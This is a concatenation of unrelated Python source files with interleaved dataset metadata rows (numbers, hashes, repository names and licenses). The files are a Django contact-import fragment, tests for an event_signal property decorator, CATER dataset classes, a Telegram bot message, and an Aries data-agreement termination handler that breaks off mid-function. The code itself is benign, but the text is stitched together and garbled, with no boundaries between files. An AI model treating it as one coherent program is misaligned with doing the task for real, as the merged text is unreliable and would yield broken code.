facility = record.get('facility').get('code')
try:
facility_obj = Facility.objects.get(code=facility)
print FacilityContact.objects.get_or_create(
contact=contact, facility=facility_obj,
created_by=system_user, updated_by=system_user)
except Facility.DoesNotExist:
print "The requested facility does not exist"
# officers mobile contacts
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0028_officer_mobile_contacts.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
conact = record.get('contact')
contact, created = Contact.objects.get_or_create(
contact=conact,
contact_type=email_type
)
# officer mobiles linked
file_path = os.path.join(
settings.BASE_DIR,
'data/new_data/mobile/0029_officer_mobile_contacts_linked.json'
)
with open(file_path) as email_contacts:
email_data = json.load(email_contacts)
records = email_data[0].get('records')
email_type = ContactType.objects.get(name='MOBILE')
for record in records:
contact = record.get('contact').get('contact')
contact, created = Contact.objects.get_or_create(
contact=contact,
contact_type=email_type
)
officer = record.get('officer')
if officer:
officer = officer.get('name')
try:
officer_obj = Officer.objects.filter(name=officer)
print OfficerContact.objects.get_or_create(
contact=contact, officer=officer_obj[0],
created_by=system_user, updated_by=system_user)
except IndexError:
print "The requested officer does not exist"
else:
print "Officer key is missing"
| 42.845283 | 80 | 0.558305 | 1,156 | 11,354 | 5.269896 | 0.08391 | 0.057452 | 0.035456 | 0.053185 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0.904793 | 0 | 0.008553 | 0.361547 | 11,354 | 264 | 81 | 43.007576 | 0.831839 | 0.027744 | 0 | 0.771186 | 0 | 0 | 0.119536 | 0.062398 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.029661 | null | null | 0.059322 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
67a1befa89003e077bb5ecdc4da680eb9346c105 | 7,633 | py | Python | tests/test_signaler_property.py | justengel/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | 6 | 2018-08-14T03:51:06.000Z | 2022-03-05T06:09:19.000Z | tests/test_signaler_property.py | HashSplat/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | null | null | null | tests/test_signaler_property.py | HashSplat/event_signal | ea07bb6c79845e04f137dfb114952224fc617925 | [
"MIT"
] | 3 | 2018-08-06T15:39:33.000Z | 2020-02-10T21:38:57.000Z | from event_signal import signaler_property, signaler
def test_property():
class XTest(object):
def __init__(self, x=0):
self._x = x
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
t = XTest()
assert t.x == 0
t.x = 1
assert t.x == 1
del t.x
try:
t.x
raise AssertionError("Deleter failed")
except AttributeError:
pass
assert isinstance(XTest.x, property)
print("test_property passed!")
def test_no_setter():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
t = XTest()
try:
t.x = 1
raise AssertionError("No setter was set. The cmd 't.x = 1' should have failed.")
except AttributeError:
pass
print("test_no_setter passed!")
def test_no_deleter():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_delete")
def x_deleting(self):
self._before_val = True
@x.on("delete")
def x_deleted(self):
self._post_val = True
t = XTest()
try:
del t.x
raise AssertionError("No deleter was set. The cmd 'del t.x' should have failed.")
except AttributeError:
pass
print("test_no_deleter passed!")
def test_change():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
existed = XTest.x.off(t, "change", t.x_changed)
assert existed
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
existed = XTest.x.off(t, "before_change", t.x_changing)
assert existed
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value
assert t._post_val == value
XTest.x.off(t, "change")
existed = XTest.x.off(t, "change")
assert not existed
print("test_change passed!")
def test_delete():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.deleter
def x(self):
del self._x
@x.on("before_delete")
def x_deleting(self):
self._before_val = True
@x.on("delete")
def x_deleted(self):
self._post_val = True
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
assert t._before_val == True
assert t._post_val == True
t._x = 0
assert t.x == 0
XTest.x.off(t, "delete", t.x_deleted)
t._before_val = None
t._post_val = None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
assert t._before_val == True
assert t._post_val is None
t._x = 0
assert t.x == 0
XTest.x.off(t, "before_delete")
t._before_val = None
t._post_val = None
del t.x
try:
t.x
raise AssertionError("t.x should not exist. The deleter failed.")
except AttributeError:
pass
assert t._before_val is None
assert t._post_val is None
print("test_delete passed!")
def test_property_block_signal():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler_property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
XTest.x.block(t, "change", True)
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
XTest.x.block(t, "change", False)
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value2
assert t._post_val == new_value2
XTest.x.block(t)
new_value3 = 4
t.x = new_value3
assert t.x == new_value3
assert t._before_val == new_value2
assert t._post_val == new_value2
XTest.x.block(t, block=False)
new_value4 = 5
t.x = new_value4
assert t.x == new_value4
assert t._before_val == new_value4
assert t._post_val == new_value4
print("test_property_block_signal passed!")
def test_signal_dot_property():
class XTest(object):
def __init__(self, x=0):
self._x = x
self._before_val = None
self._post_val = None
@signaler.property
def x(self):
return self._x
@x.setter
def x(self, value):
self._x = value
@x.on("before_change")
def x_changing(self, value):
self._before_val = value
@x.on("change")
def x_changed(self, value):
self._post_val = value
t = XTest()
assert t.x == 0
assert t._before_val is None
assert t._post_val is None
value = 1
t.x = value
assert t.x == value
assert t._before_val == value
assert t._post_val == value
XTest.x.off(t, "change", t.x_changed)
new_value = 2
t.x = new_value
assert t.x == new_value
assert t._before_val == new_value
assert t._post_val == value
XTest.x.off(t, "before_change", t.x_changing)
new_value2 = 3
t.x = new_value2
assert t.x == new_value2
assert t._before_val == new_value
assert t._post_val == value
print("test_signal_dot_property passed!")
if __name__ == '__main__':
test_property()
test_no_setter()
test_no_deleter()
test_change()
test_delete()
test_property_block_signal()
test_signal_dot_property()
print("All tests passed!")
| 21.87106 | 89 | 0.566881 | 1,070 | 7,633 | 3.773832 | 0.068224 | 0.095344 | 0.049529 | 0.071322 | 0.827142 | 0.818474 | 0.781327 | 0.781327 | 0.768202 | 0.732046 | 0 | 0.010214 | 0.333028 | 7,633 | 348 | 90 | 21.933908 | 0.78295 | 0 | 0 | 0.809524 | 0 | 0 | 0.081357 | 0.006551 | 0 | 0 | 0 | 0 | 0.238095 | 1 | 0.142857 | false | 0.051282 | 0.003663 | 0.025641 | 0.197802 | 0.029304 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
67dffaa9b9435043df4508e071dbbdb7a69e29f9 | 10,818 | py | Python | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | null | null | null | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | null | null | null | slot_language/object_slot/cater_data.py | Wuziyi616/slot_attention | ef9ddc9be1a29dc4a42dff5cdbed1dc308bc8230 | [
"Apache-2.0"
] | 1 | 2021-11-11T19:44:14.000Z | 2021-11-11T19:44:14.000Z | import os
import copy
import json
import numpy as np
from typing import Callable, List
from typing import Optional
from obj_data import ObjCLEVRVisionLanguageCLIPDataset, ObjCLEVRVisionLanguageCLIPDataModule, \
ObjAugCLEVRVisionLanguageCLIPDataset, ObjAugCLEVRVisionLanguageCLIPDataModule
class ObjCATERVisionLanguageCLIPDataset(ObjCLEVRVisionLanguageCLIPDataset):
def __init__(self,
data_root: str,
max_num_images: Optional[int],
clip_transforms: Callable,
tokenizer: str = 'clip',
max_n_objects: int = 10,
split: str = "train",
clip_len: int = 301,
prompt: str = 'a {color} {shape}',
is_video: bool = False,
shuffle_obj: bool = False,
pad_text: str = 'background'):
self.cater_subset = 'cater_cameramotion' if \
'cameramotion' in data_root else 'cater'
super().__init__(
data_root,
max_num_images,
clip_transforms,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
split=split,
clip_len=clip_len,
prompt=prompt,
is_video=is_video,
shuffle_obj=shuffle_obj,
pad_text=pad_text)
def _generate_text(self, index: int):
"""Generate text descriptions of each object in the scene."""
img_idx = self._get_idx(index)[0]
anno = self.annos[img_idx]
colors = [obj['color'] for obj in anno['objects']]
shapes = [obj['shape'] for obj in anno['objects']]
sizes = [obj['size'] for obj in anno['objects']]
# e.g. 'a large red cone'
texts = [
self.prompt.format(size=size, color=color, shape=shape)
for size, color, shape in zip(sizes, colors, shapes)
]
# pad with some special texts, e.g. 'background'
texts = texts + [self.pad_text] * (self.text_num - len(texts))
# shuffle the order of objects
if self.split == 'train' and self.shuffle_obj:
np.random.shuffle(texts)
return texts
def get_files(self) -> List[str]:
"""Load the image (video) path and loaded annotations (lists)."""
self.data_path = os.path.join(self.data_root, "videos")
assert os.path.exists(
self.data_path), f"Path {self.data_path} does not exist"
with open(
os.path.join('./data/',
f'{self.cater_subset}_{self.split}_annos.json'),
'r') as f:
self.anno_paths = json.load(f)
self.anno_paths.sort()
img_paths, all_annos = [], []
for i, anno_name in enumerate(self.anno_paths):
if self.max_num_images is not None and \
len(img_paths) > self.max_num_images:
break
anno_path = os.path.join(self.data_root, 'scenes', anno_name)
with open(anno_path, 'r') as f:
anno = json.load(f)
img_name = anno['image_filename'].replace('CLEVR_new', 'CATER_new')
image_path = os.path.join(self.data_path, img_name)
assert os.path.exists(image_path), f"{image_path} does not exist"
img_paths.append(image_path)
all_annos.append(anno)
return img_paths, all_annos
class ObjCATERVisionLanguageCLIPDataModule(ObjCLEVRVisionLanguageCLIPDataModule
):
def __init__(self,
data_root: str,
train_batch_size: int,
val_batch_size: int,
clip_transforms: Callable,
num_workers: int,
tokenizer: str = 'clip',
max_n_objects: int = 10,
prompt: str = 'a {color} {shape}',
shuffle_obj: bool = False,
pad_text: str = 'background'):
super().__init__(
data_root,
train_batch_size,
val_batch_size,
clip_transforms,
num_workers,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
prompt=prompt,
shuffle_obj=shuffle_obj,
pad_text=pad_text)
def _build_dataset(self):
self.train_dataset = ObjCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_train_images,
clip_transforms=self.clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='train',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
)
self.val_dataset = ObjCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_val_images,
clip_transforms=self.val_clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='val',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
)
class ObjAugCATERVisionLanguageCLIPDataset(ObjAugCLEVRVisionLanguageCLIPDataset
):
def __init__(self,
data_root: str,
max_num_images: Optional[int],
clip_transforms: Callable,
tokenizer: str = 'clip',
max_n_objects: int = 10,
split: str = "train",
clip_len: int = 301,
prompt: str = 'a {color} {shape}',
is_video: bool = False,
shuffle_obj: bool = False,
pad_text: str = 'background',
flip_img: bool = False):
self.cater_subset = 'cater_cameramotion' if \
'cameramotion' in data_root else 'cater'
super().__init__(
data_root,
max_num_images,
clip_transforms,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
split=split,
clip_len=clip_len,
prompt=prompt,
is_video=is_video,
shuffle_obj=shuffle_obj,
pad_text=pad_text,
flip_img=flip_img)
def _generate_text(self, index: int):
"""Generate text descriptions of each object in the scene."""
img_idx = self._get_idx(index)[0]
anno = self.annos[img_idx]
colors = [obj['color'] for obj in anno['objects']]
shapes = [obj['shape'] for obj in anno['objects']]
sizes = [obj['size'] for obj in anno['objects']]
texts = [
self.prompt.format(size=size, color=color, shape=shape)
for size, color, shape in zip(sizes, colors, shapes)
]
# pad with some special texts, e.g. 'background'
# `True` in `obj_mask` stands for foreground objects
obj_mask = np.zeros(self.text_num, dtype=np.bool)
obj_mask[:len(texts)] = True
texts = texts + [self.pad_text] * (self.text_num - len(texts))
# shuffle the order of objects
shuffled_texts, idx, shuffled_obj_mask = None, None, None
if self.split == 'train':
idx = np.arange(len(texts))
if self.shuffle_obj:
np.random.shuffle(idx)
shuffled_texts = [texts[i] for i in idx]
else:
shuffled_texts = copy.deepcopy(texts)
shuffled_obj_mask = obj_mask[idx]
return texts, shuffled_texts, idx, obj_mask, shuffled_obj_mask
def get_files(self) -> List[str]:
"""Load the image (video) path and loaded annotations (lists)."""
self.data_path = os.path.join(self.data_root, "videos")
assert os.path.exists(
self.data_path), f"Path {self.data_path} does not exist"
with open(
os.path.join('./data/',
f'{self.cater_subset}_{self.split}_annos.json'),
'r') as f:
self.anno_paths = json.load(f)
self.anno_paths.sort()
img_paths, all_annos = [], []
for i, anno_name in enumerate(self.anno_paths):
if self.max_num_images is not None and \
len(img_paths) > self.max_num_images:
break
anno_path = os.path.join(self.data_root, 'scenes', anno_name)
with open(anno_path, 'r') as f:
anno = json.load(f)
img_name = anno['image_filename'].replace('CLEVR_new', 'CATER_new')
image_path = os.path.join(self.data_path, img_name)
assert os.path.exists(image_path), f"{image_path} does not exist"
img_paths.append(image_path)
all_annos.append(anno)
return img_paths, all_annos
class ObjAugCATERVisionLanguageCLIPDataModule(
ObjAugCLEVRVisionLanguageCLIPDataModule):
def __init__(self,
data_root: str,
train_batch_size: int,
val_batch_size: int,
clip_transforms: Callable,
num_workers: int,
tokenizer: str = 'clip',
max_n_objects: int = 10,
prompt: str = 'a {color} {shape}',
shuffle_obj: bool = False,
pad_text: str = 'background',
flip_img: bool = False):
super().__init__(
data_root,
train_batch_size,
val_batch_size,
clip_transforms,
num_workers,
tokenizer=tokenizer,
max_n_objects=max_n_objects,
prompt=prompt,
shuffle_obj=shuffle_obj,
pad_text=pad_text,
flip_img=flip_img)
def _build_dataset(self):
self.train_dataset = ObjAugCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_train_images,
clip_transforms=self.clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='train',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
flip_img=self.flip_img,
)
self.val_dataset = ObjAugCATERVisionLanguageCLIPDataset(
data_root=self.data_root,
max_num_images=self.num_val_images,
clip_transforms=self.val_clip_transforms,
tokenizer=self.tokenizer,
max_n_objects=self.max_n_objects,
split='val',
prompt=self.prompt,
shuffle_obj=self.shuffle_obj,
pad_text=self.pad_text,
flip_img=self.flip_img,
)
| 38.913669 | 95 | 0.561656 | 1,210 | 10,818 | 4.744628 | 0.116529 | 0.030657 | 0.038321 | 0.02787 | 0.837833 | 0.837833 | 0.82773 | 0.819021 | 0.819021 | 0.818499 | 0 | 0.002263 | 0.34646 | 10,818 | 277 | 96 | 39.054152 | 0.80976 | 0.042429 | 0 | 0.846774 | 0 | 0 | 0.059808 | 0.008323 | 0 | 0 | 0 | 0 | 0.016129 | 1 | 0.040323 | false | 0 | 0.028226 | 0 | 0.100806 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67fa96b225cb0205e1a37313062b3fbfa8b325e5 | 197 | py | Python | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | MUP_TG_BOT/src/controllers/start_message.py | DobroAlex/Simferopol_MUP_Telegram_Bot | a26d510178ed704690c497d599e0fc4d48b0deea | [
"MIT"
] | null | null | null | def start_message():
return 'Welcome to bot. You can send your account (6 digits) to retrieve current information or use "/register ' \
'6digits" to get this information regularly '
| 49.25 | 118 | 0.705584 | 27 | 197 | 5.111111 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013072 | 0.22335 | 197 | 3 | 119 | 65.666667 | 0.888889 | 0 | 0 | 0 | 0 | 0.333333 | 0.741117 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0.333333 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
db2c5858b4fa6fd3dd0c78f63aa8f7f6ed5b40e8 | 17,806 | py | Python | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 1 | 2022-02-10T17:51:27.000Z | 2022-02-10T17:51:27.000Z | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 12 | 2021-09-19T14:27:56.000Z | 2022-03-28T13:31:58.000Z | mydata_did/v1_0/handlers/data_agreement_termination_terminate_handler.py | decentralised-dataexchange/acapy-mydata-did-protocol | c84d86d12689cfb1a29d43734ee27a03ccdf8d77 | [
"Apache-2.0"
] | 1 | 2022-01-03T14:09:05.000Z | 2022-01-03T14:09:05.000Z | from aries_cloudagent.messaging.base_handler import BaseHandler, BaseResponder, RequestContext, HandlerException
from aries_cloudagent.storage.record import StorageRecord
from aries_cloudagent.wallet.base import BaseWallet
from aries_cloudagent.wallet.indy import IndyWallet
from ..messages.data_agreement_terminate import DataAgreementTerminationTerminateMessage
from ..messages.data_agreement_terminate_ack import DataAgreementTerminationAck
from ..manager import ADAManager
from ..models.data_agreement_termination_terminate_model import DataAgreementTerminationTerminateBody
from ..models.exchange_records.data_agreement_record import DataAgreementV1Record
from ..models.data_agreement_instance_model import DataAgreementInstance, DataAgreementInstanceSchema
from ..utils.did.mydata_did import DIDMyData
from ..utils.jsonld.data_agreement import verify_data_agreement
from ..messages.problem_report import (
DataAgreementTerminationProblemReport,
DataAgreementTerminationProblemReportReason
)
from ...patched_protocols.issue_credential.v1_0.models.credential_exchange import (
V10CredentialExchange
)
from ...patched_protocols.present_proof.v1_0.models.presentation_exchange import (
V10PresentationExchange
)
import json
import datetime
class DataAgreementTerminationTerminateMessageHandler(BaseHandler):
"""Handler for data-agreement-termination/1.0/terminate message."""
async def handle(self, context: RequestContext, responder: BaseResponder):
"""Message handler logic for data-agreement-termination/1.0/terminate message."""
# Assert that the message is of the correct type
assert isinstance(
context.message, DataAgreementTerminationTerminateMessage)
self._logger.info(
"Received data-agreement-termination/1.0/terminate message: \n%s",
json.dumps(context.message.serialize(), indent=4)
)
# Check if connection is ready
if not context.connection_ready:
self._logger.info(
"Connection not active, skipping data-agreement-termination/1.0/terminate handler: %s",
context.message_receipt.sender_did,
)
return
data_agreement_termination_terminate_message = context.message
data_agreement_termination_terminate_message_body: DataAgreementTerminationTerminateBody = data_agreement_termination_terminate_message.body
# Wallet instance from request context
wallet: IndyWallet = await context.inject(BaseWallet)
# Initialize ADA manager
ada_manager = ADAManager(context)
# Fetch the data agreement instance metadata
data_agreement_instance_metadata_records = await ada_manager.query_data_agreement_instance_metadata(
tag_query={
'data_agreement_id': data_agreement_termination_terminate_message_body.data_agreement_id,
}
)
# Check if there is a data agreement instance metadata record
if not data_agreement_instance_metadata_records:
self._logger.info(
"Data agreement not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(data_agreement_instance_metadata_records) > 1:
self._logger.info(
"Duplicate data agreement records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
data_agreement_instance_metadata_record: StorageRecord = data_agreement_instance_metadata_records[
0]
# Identify the method of use
if data_agreement_instance_metadata_record.tags.get("method_of_use") == DataAgreementV1Record.METHOD_OF_USE_DATA_SOURCE:
# Fetch exchante record (credential exchange if method of use is "data-source")
tag_filter = {}
post_filter = {
"data_agreement_id": data_agreement_termination_terminate_message_body.data_agreement_id
}
records = await V10CredentialExchange.query(context, tag_filter, post_filter)
if not records:
self._logger.info(
"Credential exchange record not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(records) > 1:
self._logger.info(
"Duplicate credential exchange records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
cred_ex_record: V10CredentialExchange = records[0]
# Check if data agreement is in "accept" status
if cred_ex_record.data_agreement_status != V10CredentialExchange.DATA_AGREEMENT_ACCEPT:
self._logger.info(
"Credential exchange record not in offer sent state; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
# Reconstruct the data agreement
# Deserialise data agreement
data_agreement_instance: DataAgreementInstance = DataAgreementInstanceSchema().load(
cred_ex_record.data_agreement
)
# Check if terminate message is signed by data agreement principle did
if data_agreement_instance.principle_did != data_agreement_termination_terminate_message_body.proof.verification_method:
self._logger.info(
"Data agreement principle DID does not match sender DID; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
# Send problem report.
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.PRINCIPLE_DID_INVALID.value,
explain=f"Data agreement principle DID does not match sender DID; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement_problem_report = problem_report.serialize()
cred_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await cred_ex_record.save(context)
await responder.send_reply(problem_report)
return
# Update data agreement event with terminate event
data_agreement_instance.event.append(
data_agreement_termination_terminate_message_body.event
)
# Update data agreement proof chain with terminate proof
data_agreement_instance.proof_chain.append(
data_agreement_termination_terminate_message_body.proof
)
# Verify signatures on data agreement
verkeys = []
for event in data_agreement_instance.event:
temp_verkey = DIDMyData.from_did(event.did).public_key_b58
verkeys.append(temp_verkey)
valid = await verify_data_agreement(
data_agreement_instance.serialize(),
verkeys[-1],
wallet,
drop_proof_chain=False
)
if not valid:
self._logger.error(
"Data agreement terminate verification failed"
)
# Send problem report
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.SIGNATURE_VERIFICATION_FAILED.value,
explain=f"Data agreement terminate verification failed; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement_problem_report = problem_report.serialize()
cred_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await cred_ex_record.save(context)
await responder.send_reply(problem_report)
raise HandlerException(
"Data agreement terminate signature verification failed"
)
# Update credential exchange record with data agreement metadata
cred_ex_record.data_agreement = data_agreement_instance.serialize()
cred_ex_record.data_agreement_status = V10CredentialExchange.DATA_AGREEMENT_TERMINATE
await cred_ex_record.save(context)
# Construct terminate ack message
data_agreement_terminate_ack = DataAgreementTerminationAck(
status="TERMINATE OK"
)
data_agreement_terminate_ack.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
await responder.send_reply(data_agreement_terminate_ack)
if data_agreement_instance_metadata_record.tags.get("method_of_use") == DataAgreementV1Record.METHOD_OF_USE_DATA_USING_SERVICE:
# Fetch exchange record (presentation exchange if method of use is "data-using-service")
tag_filter = {}
post_filter = {
"data_agreement_id": data_agreement_termination_terminate_message_body.data_agreement_id
}
records = await V10PresentationExchange.query(context, tag_filter, post_filter)
if not records:
self._logger.info(
"Presentation exchange record not found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
if len(records) > 1:
self._logger.info(
"Duplicate presentation exchange records found; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
pres_ex_record: V10PresentationExchange = records[0]
# Check if data agreement is in "accept" status
if pres_ex_record.data_agreement_status != V10PresentationExchange.DATA_AGREEMENT_ACCEPT:
self._logger.info(
"Presentation exchange record not in offer sent state; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
return
# Reconstruct the data agreement
# Deserialise data agreement
data_agreement_instance: DataAgreementInstance = DataAgreementInstanceSchema().load(
pres_ex_record.data_agreement
)
# Check if terminate message is signed by data agreement principle did
if data_agreement_instance.principle_did != data_agreement_termination_terminate_message_body.proof.verification_method:
self._logger.info(
"Data agreement principle DID does not match sender DID; Failed to handle terminate message for data agreement: %s",
data_agreement_termination_terminate_message_body.data_agreement_id,
)
# Send problem report.
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.PRINCIPLE_DID_INVALID.value,
explain=f"Data agreement principle DID does not match sender DID; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement_problem_report = problem_report.serialize()
pres_ex_record.data_agreement_status = V10PresentationExchange.DATA_AGREEMENT_PROBLEM_REPORT
await pres_ex_record.save(context)
await responder.send_reply(problem_report)
return
# Update data agreement event with terminate event
data_agreement_instance.event.append(
data_agreement_termination_terminate_message_body.event
)
# Update data agreement proof chain with terminate proof
data_agreement_instance.proof_chain.append(
data_agreement_termination_terminate_message_body.proof
)
# Verify signatures on data agreement
verkeys = []
for event in data_agreement_instance.event:
temp_verkey = DIDMyData.from_did(event.did).public_key_b58
verkeys.append(temp_verkey)
valid = await verify_data_agreement(
data_agreement_instance.serialize(),
verkeys[-1],
wallet,
drop_proof_chain=False
)
if not valid:
self._logger.error(
"Data agreement terminate verification failed"
)
# Send problem report
problem_report = DataAgreementTerminationProblemReport(
from_did=data_agreement_termination_terminate_message.to_did,
to_did=data_agreement_termination_terminate_message.from_did,
created_time=str(
int(datetime.datetime.utcnow().timestamp())),
problem_code=DataAgreementTerminationProblemReportReason.SIGNATURE_VERIFICATION_FAILED.value,
explain=f"Data agreement terminate verification failed; Failed to process terminate message for data agreement: {data_agreement_termination_terminate_message.body.data_agreement_id}",
data_agreement_id=data_agreement_termination_terminate_message_body.data_agreement_id
)
problem_report.assign_thread_id(
thid=data_agreement_termination_terminate_message._id
)
# Update presentation exchange record with data agreement metadata
pres_ex_record.data_agreement_problem_report = problem_report.serialize()
